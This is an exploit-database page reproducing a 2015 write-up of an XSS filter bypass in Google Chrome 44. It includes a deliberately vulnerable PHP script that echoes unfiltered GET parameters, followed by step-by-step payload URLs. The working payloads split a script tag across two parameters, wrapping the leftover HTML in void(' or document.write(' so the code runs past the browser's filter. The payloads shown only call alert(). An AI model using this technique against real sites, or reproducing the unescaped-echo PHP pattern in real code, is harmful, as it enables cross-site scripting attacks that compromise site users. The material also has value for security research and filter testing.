Advertisement






Google Chrome 44.0.2403.157 XSS Filter Bypass

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2015-08-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015080141

Below is a copy:

Google Chrome 44.0.2403.157 XSS Filter Bypass********************************************************************************************
# Exploit Title: Google Chrome Last Version Bypass Anti-XSS filter Vulnerability
# Exploit Author: Mahdi.Hidden
# Date: 2015-08-22
# Vendor Homepage : http://chrome.google.com
# Software Link: https://www.google.com/chrome/browser/desktop/
# Version: Version 44.0.2403.157 m
# Tested on: Linux & Windows
********************************************************************************************
As you know google chrome don't execute JS Codes in Cross Site  
Scripting Vulnerability and that is for security reasons. and it stops  
many XSS attacks.
now, you have a vulnerable PHP Code like this (EX: chrome.php):

<?php

// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."<br><br>";

// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."<br><br>";

?>

(This PHP script gets two parameters and print it without any filters.  
That allows you to run JS)

If you test a Cross Site Scripting payload like this in Google chrome:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/)</script>&text2=Something

that JS code will be shown in the source but you will get no alert and  
if you see the source you find that your code was shown with red  
highlight.
that's for high security of chrome. if you try to test other payloads  
you will see the same result.
But let's try using script tag (<scrip>) without closing. it means this:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/)&text2=Something

Ok, again the code will be shown but it won't have any red highlight  
and the JS code is known as a HTML text, because of the none-closing  
tag.
now, you must close it let's try closing script tag on $_GET['text2'].

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/)&text2=</script>

in this one, your code will be completely shown without any red 
highlight or something like that, but again it will be known as a HTML text.
let's try using quoting and put the none-code texts in 2 quotations!
for example using void(''), put void(' in the parameter one and close  
it in parameter 2 like this ')
now let's try it:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script>

OK!! You will see the alert! your JS code will be execute!!! that's what we want.
you can use document.write('') or etc. instead of void('').

For example:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>

Thanks.
****************

# Details:
http://ashiyane.org/forums/showthread.php?148940

# Exploited by Mahdi.Hidden
# Ashiyane Digital Security Team

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum